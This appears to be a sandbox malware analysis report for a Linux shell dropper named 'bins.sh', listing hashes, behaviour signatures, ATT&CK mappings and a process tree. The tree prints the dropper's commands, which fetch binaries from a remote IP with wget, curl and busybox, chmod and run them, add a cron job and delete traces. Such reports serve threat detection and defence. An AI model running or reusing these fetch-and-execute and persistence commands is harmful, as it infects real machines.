5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518

Analysis

max time kernel
150s
max time network
176s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
19/11/2024, 13:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

e7858e7f06486cd924155e463d230b74
SHA1

5e5be0e1760892742e4f707d8d072d6ed603e59e
SHA256

5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518
SHA512

648b5f3a77ecfc659307360e28d4d77a59363fffccb4f099a2c997c5ab4deab216b9aae273800ad6060e284935c0b77eb7dcecf3f32bc11f6a9e6a82182698ab
SSDEEP

192:+J7L7P7rQAYa4f+eINBHGHm7L7P7rQAs+eINB8l:+ZvzrQAYa4f+eINBHq6vzrQAs+eINBu

Score

9^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Contacts a large (2091) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
694	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2	695	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

Renames itself 1 IoCs

pid	Process
696	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.VsbZTY	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/726/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/782/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/803/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/822/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/879/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/951/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/303/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/723/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/980/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/1002/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/899/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/920/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/1043/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/18/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/659/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/984/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/41/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/775/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/713/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/848/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/918/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/938/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/985/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/287/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/835/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/924/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/960/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/965/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/972/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/1004/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/715/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/750/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/783/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/993/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/1007/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/727/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/745/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/836/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/886/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/934/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/735/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/785/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/718/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/789/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/791/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/850/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/863/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/882/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/27/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/660/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/1000/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/319/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/709/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/738/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/925/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/28/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/141/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/900/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/710/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/719/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/764/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/779/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/858/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
File opened for reading	/proc/962/cmdline	25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
713	wget

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2	wget
File opened for modification	/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2	curl
File opened for modification	/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:662
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:665
- /usr/bin/wget
  wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
  2⤵
  - Writes file to tmp directory
  PID:670
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:690
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
  2⤵
  - Writes file to tmp directory
  PID:693
- /bin/chmod
  chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
  2⤵
  - File and Directory Permissions Modification
  PID:694
- /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
  ./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:695
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:697
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:698
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:699
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:700
- /bin/rm
  rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
  2⤵
  PID:709
- /usr/bin/wget
  wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5
  2⤵
  - System Network Configuration Discovery
  PID:713

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

Filesize
127KB

MD5
89077b7bd4bcafca7713be43635c4862

SHA1
fc02edb8fba29ea8ee99e6157ef8560334530052

SHA256
78416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d

SHA512
1b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1

Download Submit
/var/spool/cron/crontabs/tmp.VsbZTY

Filesize
210B

MD5
416c1ba9a6bca553928f3c65957fea5a

SHA1
4f250de27d004cdac3a051eed6bb6b535e82afab

SHA256
ea3d4febddba530442589bb21035e8a6f889f6e77455ad6228fb8b0cfbb39f73

SHA512
08c88aaba617647bc4630615818c69e10f6711f3aacd336b43fdf66f875083513a56904b3cd7693c1d7d3415289ecdf05123b4736dc7ee178f89dd8cfa47cd82

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads